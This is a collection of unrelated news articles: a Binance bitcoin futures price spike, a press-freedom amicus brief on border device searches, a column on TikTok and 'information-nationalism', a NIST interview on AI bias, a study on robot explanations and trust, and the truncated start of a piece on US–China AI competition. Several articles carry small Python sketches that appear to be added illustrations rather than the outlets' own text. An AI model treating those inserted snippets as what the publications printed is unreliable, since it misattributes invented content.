Another Day In Crypto, Warns Binance CEO After Nightmare Bitcoin Futures Spike To $100,000 – Forbes

Bitcoin, after suddenly soaring early last week, had a difficult day last weekend.

The bitcoin price briefly topped $12,000 only to flash-crash early on Sunday morning, pushing bitcoin back to just over $10,000.

Meanwhile, bitcoin and cryptocurrency exchange Binance, the world's largest by volume, was having problems of its own, with one trader briefly sending the price of some bitcoin futures to $100,000.

Bitcoin futures, allowing investors to speculate on the future price of bitcoin, have become increasingly popular in recent years.

"Another day in crypto," Binance chief executive Changpeng Zhao, often known as CZ, warned via Twitter, revealing the bitcoin futures price spike and explaining, "a user's [algorithm] went ballistic and sent multiple orders to achieve this."

Bitcoin futures trading has surged in popularity over the last year or so, pushed on by exchanges such as Binance, and the Chicago Mercantile Exchange (CME) and the Chicago Board Options Exchange (CBOE) offering long-awaited cash-settled bitcoin futures.

According to a statement released by Binance after the "large price fluctuation," the "extreme" price movement in the bitcoin quarterly futures contract "did not cause any liquidations in user positions."

"We do have price band protection," CZ added, meaning the rogue trade did not cause other traders to lose the capital they'd used to speculate on the future bitcoin price.
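Binance has not published how its price band protection works; as a rough illustration of the idea, a filter of this kind might simply reject orders priced too far from a reference ("mark") price. Everything below, including the 5% band and the function name, is invented for the sketch:

```python
# Hypothetical sketch of a price-band check, illustrating the kind of
# protection CZ describes. All thresholds are invented for the example;
# Binance has not published its actual parameters.

def within_price_band(order_price: float, mark_price: float,
                      band_pct: float = 0.05) -> bool:
    """Accept only orders priced within band_pct of the mark price."""
    lower = mark_price * (1 - band_pct)
    upper = mark_price * (1 + band_pct)
    return lower <= order_price <= upper

# A rogue order at $100,000 while the mark price sits near $10,000
# falls far outside a 5% band and would be rejected, or at least would
# not move the mark price that liquidations are keyed to.
print(within_price_band(100_000, 10_000))  # False
print(within_price_band(10_300, 10_000))   # True
```

The key design choice is that liquidations are triggered by the protected mark price rather than the last traded price, which is how a single wild print can occur without wiping out leveraged positions.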

The bitcoin futures spike to around $100,000 was explained by one user's algorithm going "ballistic."

Despite assurances, the bitcoin futures price spike caused consternation among crypto traders.

"Crazy price spikes like this are a trader's worst nightmare," professional bitcoin and crypto trader and author of The Crypto Trader, Glen Goodman, said via email.

"Thankfully, Binance's systems ensured nobody's account was liquidated, but not all exchanges would be so responsible in a similar situation."

Bitcoin and crypto exchanges including Malta-based OKEx, Singapore-based Huobi and Seychelles-based BitMEX, along with Binance, currently of no fixed address, dominate bitcoin futures trading, with billions of dollars' worth of contracts traded across the platforms every day.

"It's a wake-up call to all traders that you need to make sure you use a respected exchange for your trading," Goodman said, adding: "It's also a timely reminder that when you trade obscure derivatives like quarterly bitcoin futures, all it takes is one giant whale to corner all the little fish and liquidate their accounts."

Others, however, saw the bitcoin futures price spike as nothing more than an unfortunate blip for the burgeoning market.

"Bitcoin has come a long way in the past 11 years," Cory Klippsten, tech investor and founder of bitcoin buying app Swan Bitcoin, said via Telegram. "An event like this on a single exchange is no longer a cause for concern."

The bitcoin price has soared over the last month, adding a staggering 25% and pushing it above the psychological $10,000 per bitcoin level.

Klippsten pointed to bitcoin's tumultuous history of spikes and crashes as evidence this latest roller coaster won't negatively impact bitcoin or cryptocurrency in the long term.

"Anomalies on individual exchanges don't seem to matter much for adoption," Klippsten said.

"The history of the space has been filled with flash crashes or spikes and exchange hacks, but observant people understand that it's a matter of improving on immature infrastructure, not a problem with cryptocurrency itself."


Reporters Committee amicus brief in Alasaad v. Wolf – Reporters Committee for Freedom of the Press

Amicus brief filed by the Reporters Committee for Freedom of the Press, the Knight First Amendment Institute at Columbia University, and 12 media organizations

Court: U.S. Court of Appeals for the First Circuit

Date Filed: August 7, 2020

Background: Representing several international travelers, including journalists, the American Civil Liberties Union and the Electronic Frontier Foundation sued the heads of the U.S. Department of Homeland Security, U.S. Customs and Border Protection, and U.S. Immigration and Customs Enforcement, arguing that suspicionless searches of electronic devices at the U.S. border violated Fourth Amendment protections.

The district court agreed with the plaintiffs, but held that border agents needed to meet only the reasonable suspicion standard, rather than the more stringent probable cause standard, before searching a traveler's devices. The government and the plaintiffs both appealed to the U.S. Court of Appeals for the First Circuit.

Our Position: Border officials should be required to seek warrants based on the higher probable cause standard before they can search electronic devices.

Quote: Electronic device searches are highly invasive, especially for journalists. The contents of electronic devices can reveal the stories a journalist is developing, with whom she is communicating, and her specific travel plans. Disclosure of such information can expose sensitive newsgathering methods and deter potential sources from speaking to members of the media.

Related: This is the second friend-of-the-court brief that the Reporters Committee and the Knight First Amendment Institute have filed on behalf of the plaintiffs in this case. At the trial court level, when DHS, CBP, and ICE asked the district court to dismiss the case, the Reporters Committee and the Knight First Amendment Institute, represented pro bono by attorneys from Jenner & Block and Morgan, Lewis & Bockius LLP, filed a brief urging the court to deny the government's motion. The court allowed the case to continue.

According to a Reporters Committee analysis of U.S. Press Freedom Tracker data, journalists reported being subjected to secondary screenings, questionings, or searches by U.S. Customs and Border Protection 16 times in 2019, compared to 11 in 2018 and 16 in 2017. Seventy-five percent of the stops in 2019 occurred at the U.S.-Mexico border.


The US declared war on TikTok because it can't handle the truth – The Verge

I cannot emphasize enough how messed up this entire "sell TikTok to an American company" saga is. The latest twist is a deeply confusing set of executive orders banning transactions with ByteDance (TikTok's Chinese parent company) and WeChat (a Chinese texting app). The legal dubiousness of this move is the least strange thing about it.

But there is no use in dwelling on it. As of writing, ByteDance is in talks to sell TikTok to Microsoft. The only question worth thinking about is why this matters to ordinary Americans. More specifically: should we be afraid of Chinese apps like TikTok?

In July, Secretary of State Mike Pompeo told Fox News that Americans should only use TikTok "if you want your private information in the hands of the Chinese Communist Party." It's not just the GOP administration lashing out, either; the Democratic National Committee has also previously issued warnings to campaign staff not to use TikTok on their work phones, citing how much data is gathered.

TikTok does gather a lot of personal data, but it's no more than what Facebook and other social networks also gather. The difference between TikTok and Facebook is that we have a great deal of transparency into the process by which Facebook gives your information to various governments. And specifically, Facebook does not release data to the Chinese government.

When it comes down to it, the thorniest privacy dispute of 2020 isn't about privacy or technology at all; it's about China. The question "Is Facebook better, worse, or the same as TikTok?" is more or less the same as "Is the United States better, worse, or the same as China?"

And in 2020, this is becoming a genuinely difficult question to answer. China is detaining over a million Uighurs in internment camps, citing national security issues. The United States detains migrants in its own internment camps, even going as far as to place children in cages. China is not a democracy; the American president has proposed to unconstitutionally delay this year's election. China brutally represses its political dissidents; in America, law enforcement in military camouflage have grabbed protesters off the streets and shoved them into unmarked vans.

Earlier this summer, the American president decided to tweet "when the looting starts, the shooting starts" in response to mass protests, only a few days before the anniversary of the Tiananmen Square massacre. I am writing this column from Portland, Oregon, with my gas mask hanging next to my desk. When I go to tie my shoes, my laces emit faint puffs of residual tear gas.

The protests in my city are the same protests happening elsewhere in the country: protests against police violence and racial discrimination. As these protests were raging, Secretary Pompeo gave a speech at the National Constitution Center in Philadelphia where he attacked The New York Times' 1619 Project, which originated as a special issue of The New York Times Magazine containing articles examining slavery and its lasting legacy in everything from mass incarceration to pop music.

"They want you to believe that Marxist ideology, that America is only the oppressors and the oppressed," said Pompeo. "The Chinese Communist Party must be gleeful when they see the New York Times spout this ideology."

In a tweet that excerpted the speech, he called the project "a slander on our great people."

One might ask, why on earth would the Chinese Communist Party give a damn about a year-old article on the relationship between race and the construction of the interstate highways?

Pompeo's invocation of the Chinese government only makes sense if you break apart the assumptions piece by piece. The 1619 Project criticizes America; to criticize America is to make it weak; to make America weak is to make China strong.

I call this ideology information-nationalism. Here's how I would describe its assumptions:

1. When your country acknowledges human rights abuses, you are made weak

2. You can weaken rival nation-states by exposing their human rights abuses

For a long time, China's crackdown on all references to the 1989 Tiananmen Square massacre has been held as the prime example of the dangers of internet censorship. It is also the clearest example of information-nationalism: to allow Chinese citizens to speak of or remember Tiananmen Square is to cultivate weakness.

So China can't acknowledge Tiananmen Square or its present-day treatment of the Uighurs. For the inverse reason, Russian disinformation operations on Facebook have promoted real videos of police brutality in America and attempted to organize Black Lives Matter protests. Before that, Russian state media outlet RT excelled in its coverage of Occupy Wall Street and WikiLeaks. For years, Russia has sought to emphasize and even exacerbate existing tensions in the United States, presumably because it believes this is in Russia's own interest.

Now, the American government is spinning the 1619 Project as slander that aids the Chinese Communist Party.

Information-nationalism is part of a larger trend toward authoritarianism in the world, but it should still be distinguished from its other facets. It is related to totalitarianism, which frequently relies on propaganda and surveillance, but it is not exactly the same. It walks closely with fascism, which thrives on mythologizing shared national identities.

But information-nationalism is not about mythologies or misinformation. When you play the game of information-nationalism, you don't slander your enemies; you tell the truth about them, while hiding the truth about yourself.

The major players in this game are China (with its unrivaled surveillance-censorship apparatus and Great Firewall), Russia (with its highly successful RT network and its shadowy Internet Research Agency), and the US (which still lays claim to some of the biggest tech companies in the world). At this point in time, the leaders of all three countries have bought into the same values and same assumptions about information-nationalism. It is not so much a cold war as it is three identical Spider-Mans pointing fingers at each other.

Ten years ago, I would have deemed the project of information-nationalism to be an authoritarian delusion in the face of an unruly and powerful technology. Come on, guys, it's the internet! But consider this 2018 New York Times article about social media use by the younger generation in mainland China.

Chu Junqing, also 28, a human resources representative, said she spent two to three hours watching funny short videos after work on Tik Tok. She reads news sometimes on the news app Jinri Toutiao but found that many countries were embroiled in wars and riots. "China is so much better," she said.

The same article goes on to describe a survey of 10,000 Tencent users born in 2000 or later. Nearly 8 in 10 believed that China had either never been better or was becoming better every day; almost as many were optimistic about the future. (A Pew Research Center poll of Americans in the same year found that 44 percent were somewhat or very pessimistic about America's future.)

This is not to say that this is because China is winning at information-nationalism. (Consider the protests in Hong Kong.) But because it has successfully built an ecosystem of China-specific apps and services all tied to a centralized censorship-surveillance apparatus, it is capable of engaging in information-nationalist warfare at a level the US presently cannot. (Consider how TikTok, which carried footage of the protests, is now blocked in Hong Kong.)

For many years, the United States ran its own version of the Chinese state-controlled internet apparatus, but we just called it the internet. It's not only that its predecessor, the ARPAnet, was an American military project. In very recent memory, the global internet was dominated by services like Google, YouTube, Facebook, Twitter, and so on. These companies, founded in the United States and run primarily by Americans on American soil, implicitly transmitted American values and culture to other countries.

Google, for instance, pulled out of China in 2010 when the company discovered the country had been attempting to hack into activists' Gmail accounts. The company felt it could no longer stay for moral reasons. And although China's censorship of the Tiananmen Square massacre was not the official reason that Google pulled out, it became a pretty good post facto justification. The company's immediate response to the hack was to stop censoring search results. Shortly after, then-Secretary of State Hillary Clinton gave a speech at the Newseum in which she compared Chinese censorship to an information "iron curtain." In the same speech, she was supportive of Google, saying, "I hope that refusal to support politically motivated censorship will become a trademark characteristic of American technology companies. It should be part of our national brand."

In 2000, Yahoo! fought against French laws banning the sale of Nazi memorabilia, citing American free speech rights. (They lost in 2006.) In 2009, as photos and videos of Iran's Green Revolution exploded across Twitter, the Clinton State Department privately reached out to the company asking them to delay scheduled maintenance, lest they disrupt information-swapping by Tehrani dissidents.

In these instances and more, American tech companies behaved as an informal arm of the US State Department, operating on the assumption that the freedom of expression and the freedom to dissent against any government are not just inherent goods, but values that, when spread abroad, will strengthen America's diplomatic position. Free speech, capitalism, and Coca-Cola for all.

This, as it turned out, was a neat piece of hypocrisy, as revealed by Edward Snowden in 2013. Just like China had tried to use Google to spy on its activists, the National Security Agency had been secretly collecting bulk data from almost every American company you could think of. The mass collusion of American tech companies in programs like PRISM created a disillusionment that gradually decayed into a kind of moral ambivalence in Silicon Valley. If America does it, why not let China? And conversely: if China does it, why not America?

But still, hypocritical or not, the old American internet was in no way equivalent to the Great Firewall of China. And neither is the old foreign policy equivalent to the new. Regardless of how the American government behaved in secret, its public-facing policy was once to promote liberal democracy. Now it is openly engaged in information-nationalism.

Information-nationalism pervades many arenas, beyond the issues of racism and political dissent. The federal government has made it harder to see numbers on coronavirus infections. The president has even said on the record that increased testing will make him look bad. The logic behind this is the same logic that drove the Chinese Communist Party to hide the pandemic in Wuhan in the very early days, much to everyone's detriment. The similarities in their behavior will not stop the president from blaming China for a cover-up; that's exactly how information-nationalism works.

The United States has embarked on a new relationship with the world, and with truth, that will shape technologies in the years to come. It will motivate economic regulation, censorship statutes, export laws, and even domestic bans of foreign apps and services. This is not to say: Companies good; government bad. Rest assured, everyone and everything is bad. It's bad all the way down. What I'm saying is, this is the context in which various proposals to regulate tech, both the meritorious and the inane, are being developed.

In May, Twitter attached a fact-checking note to two of the president's tweets about mail-in ballots. For this display of floppy-yet-still-extant spine from Twitter, Inc., the White House issued an executive order of dubious legality threatening to take away Communications Decency Act Section 230 protections from tech companies based on rule-making by the Federal Communications Commission.

Although this executive order purports to limit Section 230, that's not the real goal. Without Section 230, Twitter would be liable to a host of people affected by President Trump's own tweets, like Joe Scarborough, whom the president has smeared with a murder accusation. If Scarborough sues Twitter, the logical result is that Trump's tweets are censored.

The executive order is instead better understood as an attempt to bully companies into regulating speech according to the government's tastes. What that would look like can be stitched together based on who or what they claim is being censored.

Keep in mind that the executive order was prompted by a fact-check of a claim about election fraud in mail-in voting. Since then, the president has again tweeted the same claim, this time using it to suggest that the election should be delayed. (The co-founder of the conservative Federalist Society, Steve Calabresi, has called the tweet "fascistic.")

But let's set aside the part about American democracy dangling by a thread and look at other examples of unfairly "censored" speech: speech that, according to the government, should be protected from the caprices of social media moderation. One study has been touted as proving that conservatives are censored more on social media, but a closer look is deeply damning. The study chose, among others, the following accounts to represent the conservative side: the former KKK leader David Duke, the white nationalist Richard Spencer, and, I am not making this up, the literal American Nazi Party.

The study may be an outlier in its brazenness, but that's what it takes in order to claim that there is a bias against conservative speech. Social networks have a baked-in bias in favor of conservative speech, in that they will use a newsworthiness exception to avoid moderating the president's increasingly unhinged posts, even if they break the rules.

Twitter broke with precedent when, the day after the executive order on social media was signed, the platform censored a presidential tweet saying "when the looting starts, the shooting starts," on the grounds that it glorified violence.

The tweet was about the George Floyd protests in Minneapolis, but that's not where the phrase originated: a Miami police chief used it in 1967, announcing a "get tough" policy in the city's "Negro district." Like so much speech in the Trump era, the racism is closer to text than subtext. In order to defend the tweet, one not only has to erase the origin of the quote, but twist oneself into knots over the historical connotations of "thugs" and "looting" and the present-day context of applying those words to a Black Lives Matter protest.

That's, of course, the point. Information-nationalism is not an inherently racist ideology. But in order to confront racism, one must be clear-eyed about the country's past and present. It's no coincidence that anti-Semitism is tied so closely to Holocaust denialism, or that racists today claim that the Confederacy rebelled for reasons other than slavery. Under the logic of information-nationalism, forgetting is strength and remembering is weakness. Thus, anti-racism becomes dangerous, while racism is just another valid political viewpoint.

So what would a rejection of information-nationalism look like? The opposite of information-nationalism is not free speech as Americans know it. It is rather found in Germany, a country with strict hate speech laws that are antithetical to the American civil libertarian tradition.

I think a lot about the New Yorker profile of German Chancellor Angela Merkel, especially this passage that describes the halls of power that Merkel walks. Red Army graffiti from the conquest of Berlin, including "Moscow to Berlin 9/5/45" and "I fuck Hitler in the ass," is kept on display. Reminders of the horrors of the Holocaust and the Nazi regime litter Berlin's landscape. The New Yorker's George Packer concludes, "Like a dedicated analysand, Germany has brought its past to the surface, endlessly discussed it, and accepted it, and this work of many years has freed the patient to lead a successful new life."

In 2020, one may very well question this stirring conclusion. (A right-wing extremist shot a regional German politician in the head in 2019; this February, another extremist murdered nine people of foreign heritage in Hanau.) Still, there's something to be said about the German approach. It stands as opposed to information-nationalism as any country can get, and yet Germany has not fallen.

American leaders are not eager for the United States to take its collective self to the psychiatrist's couch to hash out its hidden pathologies. That's nothing new; America has never really officially grappled with its past. (To be fair, very few nations do!) Still, there is a big difference between not teaching Howard Zinn in high school and banning Howard Zinn. For the secretary of state to attack an anti-racist examination of history as a national slander is a significant step toward the latter.

That doesn't mean ordinary Americans want to participate in information-nationalism. Indeed, people literally lined up on the street to get free copies of the 1619 Project magazine issue on the day it published. The majority of Americans believe that Black Americans are discriminated against, especially by the police.

For months, protests have been widespread in cities across the country. In early June, a poll found that 54 percent of Americans believed that the actions of protestors, including the burning of a police precinct, sparked by the death of George Floyd at the hands of Minneapolis police were either fully or partly justified. In my home of Portland, Oregon, the protests have been going on for over 60 days, with an uptick in conflict in just the past three weeks, after local news reported that federal law enforcement had seized at least one protester off the street and pulled him into an unmarked minivan.

Lately, I have seen Portlanders using traffic cones and water bottles to trap and defuse tear gas canisters, or using leaf blowers to blow the gas back at the police. These are strategies they learned from watching videos of the Hong Kong protests, videos disseminated on TikTok and Twitter.

In order for the project of information-nationalism to gather steam in the United States, it will have to overcome not only the will of the people, but traditions like the freedom of the press. The news outlet that first reported the unmarked van arrest by federal agents was Oregon Public Broadcasting, which takes a small part of its funding from the federal government. We still live in a country where government funds can be used to criticize the government.

But institutions and popular dissent erode under steady pressure. Time and new technologies can carve out unthinkable landscapes. China did not forget Tiananmen Square overnight; Russia's Internet Research Agency wasn't built in a day. The banning of apps, the passage of new digital surveillance laws, the regulation of speech on platforms, the government sponsorship (implicit or explicit) of new technologies: these are the battles that make up information-nationalist warfare.

For what it's worth, I do not think America will build its own Great Firewall. But this has less to do with faith in the strength of American values and more to do with the sheer scope of such a project. I'm pretty sure America can only make a very poor imitation of the Chinese surveillance-censorship apparatus, just like I'm pretty sure TikTok by Microsoft is going to suck balls.

In other words, the United States has embroiled itself in a war it cannot win and has no business fighting in the first place. I suppose that is one American tradition that wont be easily undone.


Tackling the problem of bias in AI software – Federal News Network

Best listening experience is on Chrome, Firefox or Safari. Subscribe to Federal Drive's daily audio interviews on Apple Podcasts or PodcastOne.

Artificial intelligence is steadily making its way into federal agency operations. It's a type of software that can speed up decision-making, and grow more useful with more data. A problem is that if you're not careful, the algorithms in AI software can introduce unwanted biases, and therefore produce skewed results. It's a problem researchers at the National Institute of Standards and Technology have been working on. With more, the chief of staff of NIST's information technology laboratory, Elham Tabassi, joined Federal Drive with Tom Temin.

Tom Temin: Ms. Tabassi, good to have you on.

Elham Tabassi: Thanks for having me.

Tom Temin: Let's begin at the beginning here. And we hear a lot about bias in artificial intelligence. Define for us what it means.

Elham Tabassi: That's actually a very good question, and a question that researchers are working on, and a question that we are trying to find an answer to along with the community, and discuss during the workshop that's coming up in August. It's often the case that we all use the same term meaning different things. We talk about it as if you know exactly what we're talking about, and bias is one of those terms. The International Standards Organization, ISO, has a subcommittee working on standardization of bias, and they have a document that, with collaborations of experts around the globe, is trying to define bias. So, one, there isn't a good definition for bias yet. What we have been doing at NIST is a literature survey trying to figure out how it has been defined by different experts, and we will discuss it further at the workshop. Our goal is to come up with a shared understanding of what bias is. I avoid the term definition and talk about the shared understanding of what bias is. The current draft of standards, and the current sort of understanding of the community, is going toward defining bias in terms of disparities in error rates and performance for different populations, different devices or different environments. So one point I want to make here is what we call bias may be designed in. So if you have different error rates for different subpopulations, face recognition that you mentioned, that's not a good bias and something that has to be mitigated. But sometimes, for example, for car insurance, it has been designed in a way that certain populations, younger people, pay a higher insurance rate than people in their 40s or 50s, and that is by design. So not every difference in error rate is bias; it's the unintended behavior or performance of the system that's problematic and needs to be studied.
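The "disparities in error rates" notion Tabassi describes can be made concrete with a small sketch: compute a classifier's error rate separately for each subpopulation and compare. The data, group labels, and function name below are made up purely for illustration:

```python
# Minimal sketch of measuring bias as per-group error-rate disparity.
# Each record is (group, predicted_label, actual_label); the data is
# invented for the example.

from collections import defaultdict

def error_rates_by_group(records):
    """Return {group: fraction of records where prediction != actual}."""
    errors = defaultdict(int)
    totals = defaultdict(int)
    for group, predicted, actual in records:
        totals[group] += 1
        if predicted != actual:
            errors[group] += 1
    return {g: errors[g] / totals[g] for g in totals}

records = [
    ("A", 1, 1), ("A", 0, 0), ("A", 1, 0), ("A", 1, 1),  # 1 error in 4
    ("B", 0, 1), ("B", 1, 0), ("B", 0, 0), ("B", 1, 1),  # 2 errors in 4
]
rates = error_rates_by_group(records)
print(rates)  # {'A': 0.25, 'B': 0.5}
# A gap like this (25% vs. 50%) is the kind of unintended disparity
# that would flag the system for closer examination.
```

As the interview stresses, the hard part is not this arithmetic but agreeing on which disparities count as bias and which are by design.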

Tom Temin: Yeah, maybe a way to look at it is: if a person's brain had all of the data that the AI algorithm has, and that person was an expert and would come up with a particular solution, and there's a variance between what that would be and what the AI comes up with, that could be a bias.

Elham Tabassi: Yes, it could be, but then let's not forget about human biases, and that is actually one source of bias in AI systems. Bias in an AI system can creep in in different ways. It can creep into the algorithm because AI systems learn to make decisions based on the training data, which can include biased human decisions or reflect historical or societal inequalities. Sometimes the bias creeps in because the data is not rightly representative of the whole population; the sampling was done so that one group is overrepresented or underrepresented. Another source of bias can be in the design of the algorithm and in the modeling of that. So biases can creep in in different ways: sometimes human biases exhibit themselves in the algorithm, sometimes the algorithm modeling picks up some biases.

Tom Temin: But you could also get bias in AI systems that don't involve human judgment or judgment about humans whatsoever. Say it could be an AI program running a process control system or producing parts in a factory, and you could still have results that skew beyond what you want over time because of a bias built in that's of a technical nature. Would that be fair to say?

Elham Tabassi: Correct, yes. So if the training data set is biased or not representative of the space of the whole possible input, then you have bias. One real research question is how to mitigate bias and unbias the data. Another one is whether there's anything during the design and building of a model that can introduce bias, the way the models are developed.

Tom Temin: So nevertheless, agencies have a need to introduce these algorithms and these programs into their operations, and they're doing so. What are some of the best practices for avoiding bias in the outcomes of your AI system?

Elham Tabassi: The research is still out there. This is one of those cutting-edge research areas, and we see a lot of good research and results coming out from AI experts every day. But really, to measure bias and mitigate bias, the first step is to understand what bias is, and that's your first question. So unless we know what it is that we want to measure, and we have a consensus and understanding and agreement on what it is that we want to measure, which goes back to that shared understanding of bias or definition of bias, it's hard to get into the measurement. So we are spending a little bit more time on getting everybody on the same page on understanding what bias is, so we know what it is that we want to measure. Then we get into the next step of how to measure, which is the development of the metrics for understanding and examining and measuring bias in systems. And it can be measuring biases in the data and the algorithm, so on and so forth. Then it's even after these two steps that we can talk about the best practices or the best way of mitigating the bias. So we are still a bit early in understanding how to measure, because we don't have a good grip on what it is that we want to measure.

Tom Temin: But in the meantime, I've heard of some agencies simply using two or more algorithms to do the same calculation, such that the biases in them can cancel one another out, or using multiple data sets that might have canceling biases, just to make sure that at least there's balance in there.

Elham Tabassi: Right. That's one way, and that goes back to what we talked about at the beginning of the call, about having a poor representation. You just talked about having two databases, so that can mitigate the problem of skewed representation or sampling. Likewise, in the literature there are already many, many definitions of bias. There are also many different methods and guidance and recommendations on what to do, but what we are trying to do is come up with an agreed, unified way of doing these things, and that is still cutting-edge research.
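The cancellation idea Temin describes can be sketched in a few lines: if independently trained models skew in opposite directions, averaging their outputs reduces the net bias. The two "models" below are hypothetical stand-ins:

```python
def ensemble_predict(models, x):
    """Average the scores of independently trained models; if their
    biases are uncorrelated, averaging can partially cancel them out."""
    scores = [model(x) for model in models]
    return sum(scores) / len(scores)

# Two hypothetical scorers whose errors skew in opposite directions:
model_a = lambda x: x + 0.25   # systematically over-predicts
model_b = lambda x: x - 0.25   # systematically under-predicts

print(ensemble_predict([model_a, model_b], 1.0))  # 1.0 (the biases cancel)
```

Note the caveat implicit in her answer: this only helps when the biases genuinely differ; two models trained on the same skewed data will simply agree on the skew.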

Tom Temin: Got it. And in the meantime, NIST is planning a workshop on bias in artificial intelligence. Tell us when and where, and what's going to happen there.

Elham Tabassi: Right, that workshop is going to be on August 18. It's a whole-day workshop. Our plan was to have a two-day workshop, but because it's a virtual workshop, we decided to just have it as one day. It is one of a series of workshops that NIST plans to organize in the coming months. The series is trying to get at the heart of what constitutes trustworthiness: what the technical requirements are and how to measure them. Bias is one of those technical requirements, and we have a dedicated workshop on it on August 18, where we want there to be interactive discussions with the participants. The whole morning is dedicated to discussion of data and bias in data, and how biases in data can contribute to bias in the whole AI system. We have a panel in the morning, a stage-setting panel that frames the discussion, and then there will be breakout sessions. In the afternoon, the same format and discussion will be around biases in the algorithm and how those can make an AI system biased.

Tom Temin: Who should attend?

Elham Tabassi: AI developers, the people who are actually building AI systems; AI users, the people who want to use AI systems; and policymakers, who will get a better understanding of the issues of bias in AI systems. So anyone who develops or uses the technology, and policymakers.

Tom Temin: If you're a program manager or policymaker and your team is cooking up something with AI, you probably want to know what it is they're cooking up in some detail, because you're gonna have to answer for it eventually, I suppose.

Elham Tabassi: That's right. And if I didn't emphasize it enough, of course, also the research community, because they are the ones we go to for innovation and solutions to the problem.

Tom Temin: Elham Tabassi is chief of staff of the information technology laboratory at the National Institute of Standards and Technology. Thanks so much for joining me.

Elham Tabassi: Thanks for having me.

Tackling the problem of bias in AI software - Federal News Network

The next frontier of human-robot relationships is building trust – Scroll.in

Artificial intelligence is entering our lives in many ways: on our smartphones, in our homes, in our cars. These systems can help people make appointments, drive and even diagnose illnesses. But as they continue to serve important and collaborative roles in people's lives, a natural question is: Can I trust them? How do I know they will do what I expect?

Explainable artificial intelligence is a branch of artificial intelligence research that examines how artificial agents can be made more transparent and trustworthy to their human users. It seeks to develop systems that human beings find trustworthy while still performing their designed tasks well. Trustworthiness is essential if robots and people are to work together.

At the Center for Vision, Cognition, Learning, and Autonomy at the University of California, Los Angeles, we and our colleagues are interested in what factors make machines more trustworthy, and how well different learning algorithms enable trust. Our lab uses a type of knowledge representation (a model of the world that artificial intelligence uses to interpret its surroundings and make decisions) that can be more easily understood by humans. This naturally aids explanation and transparency, thereby improving the trust of human users.

In our latest research, we experimented with different ways a robot could explain its actions to a human observer. Interestingly, the forms of explanation that fostered the most human trust did not correspond to the learning algorithms that produced the best task performance. This suggests performance and explanation are not inherently dependent upon each other: optimising for one alone may not lead to the best outcome for the other. This divergence calls for robot designs that take into account both good task performance and trustworthy explanations.

In undertaking this study, our group was interested in two things. How does a robot best learn to perform a particular task? And how do people respond to the robot's explanation of its actions?

We taught a robot to learn from human demonstrations how to open a medicine bottle with a safety lock. A person wore a tactile glove that recorded the poses and forces of the human hand as it opened the bottle. That information helped the robot learn what the human did in two ways: symbolic and haptic. Symbolic refers to meaningful representations of your actions: for example, the word "grasp." Haptic refers to the feelings associated with your body's postures and motions: for example, the sensation of your fingers closing together.

First, the robot learned a symbolic model that encodes the sequence of steps needed to complete the task of opening the bottle. Second, the robot learned a haptic model that allows the robot to imagine itself in the role of the human demonstrator and predict what action a person would take when encountering particular poses and forces.

It turns out the robot was able to achieve its best performance when combining the symbolic and haptic components. The robot did better using knowledge of the steps for performing the task and real-time sensing from its gripper than using either alone.
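The fusion of the two components can be pictured as a weighted combination of each model's confidence in a candidate action. The equal weighting, function names and toy probabilities below are illustrative assumptions, not the researchers' actual formulation:

```python
def combined_score(symbolic_prob, haptic_prob, weight=0.5):
    """Blend the symbolic model's estimate (does this action fit the
    learned step sequence?) with the haptic model's estimate (does it
    fit the current gripper poses and forces?)."""
    return weight * symbolic_prob + (1 - weight) * haptic_prob

def pick_action(candidates, weight=0.5):
    """candidates maps an action name to (symbolic_prob, haptic_prob)."""
    return max(candidates,
               key=lambda a: combined_score(*candidates[a], weight))

# Toy example: the step sequence favours "twist"; the current force
# reading favours "push". The fused score decides.
candidates = {"push": (0.2, 0.9), "twist": (0.8, 0.6)}
print(pick_action(candidates))  # twist
```

The point mirrors the finding above: either signal alone can be misled, while the combination uses both the plan and the real-time sensing.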

Now that the robot knows what to do, how can it explain its behavior to a person? And how well does that explanation foster human trust?

To explain its actions, the robot can draw on its internal decision process as well as its behavior. The symbolic model provides step-by-step descriptions of the robot's actions, and the haptic model provides a sense of what the robot gripper is feeling.

In our experiment, we added an additional explanation for humans: a text write-up that provided a summary after the robot had finished attempting to open the medicine bottle. We wanted to see if summary descriptions would be as effective as the step-by-step symbolic explanation at gaining human trust.

We asked 150 human participants, divided into four groups, to observe the robot attempting to open the medicine bottle. Each group then received a different explanation of the task: symbolic (step-by-step), haptic (arm positions and motions), a text summary, or symbolic and haptic together. A baseline group observed only a video of the robot attempting to open the bottle, with no additional explanation.

We found that providing both the symbolic and haptic explanations fostered the most trust, with the symbolic component contributing the most. Interestingly, the explanation in the form of a text summary didn't foster more trust than simply watching the robot perform the task, indicating that humans prefer robots to give step-by-step explanations of what they're doing.

The most interesting outcome of this research is that what makes robots perform well is not the same as what makes people see them as trustworthy. The robot needed both the symbolic and haptic components to do the best job. But it was the symbolic explanation that made people trust the robot most.

This divergence highlights important goals for future artificial intelligence and robotics research: to focus on pursuing both task performance and explainability. Only focussing on task performance may not lead to a robot that explains itself well. Our lab uses a hybrid model to provide both high performance and trustworthy explanations.

Performance and explanation do not naturally complement each other, so both goals need to be a priority from the start when building artificial intelligence systems. This work represents an important step in systematically studying how human-machine relationships develop, but much more needs to be done. A challenging step for future research will be to move from I trust the robot to do X to I trust the robot.

For robots to earn a place in peoples daily lives, humans need to trust their robotic counterparts. Understanding how robots can provide explanations that foster human trust is an important step toward enabling humans and robots to work together.

Mark Edmonds, PhD Candidate in Computer Science, University of California, Los Angeles. Yixin Zhu, Postdoctoral Scholar in Computer Science, University of California, Los Angeles.

This article first appeared on The Conversation.


The U.S. Has AI Competition All Wrong – Foreign Affairs

The development of artificial intelligence was once a largely technical issue, confined to the halls of academia and the labs of the private sector. Today, it is an arena of geopolitical competition. The United States and China each invest billions every year in growing their AI industries, increasing the autonomy and power of futuristic weapons systems, and pushing the frontiers of possibility. Fears of an AI arms race between the two countries abound, and although the rhetoric often outpaces the technological reality, rising political tensions mean that both countries increasingly view AI as a zero-sum game.

For all its geopolitical complexity, AI competition boils down to a simple technical triad: data, algorithms, and computing power. The first two elements of the triad receive an enormous amount of policy attention. As the sole input to modern AI, data is often compared to oil, a trope repeated everywhere from technology marketing materials to presidential primaries. Equally central to the policy discussion are algorithms, which enable AI systems to learn and interpret data. While it is important not to overstate its capability in these realms, China does well in both: its expansive government bureaucracy hoovers up massive amounts of data, and its tech firms have made notable strides in advanced AI algorithms.

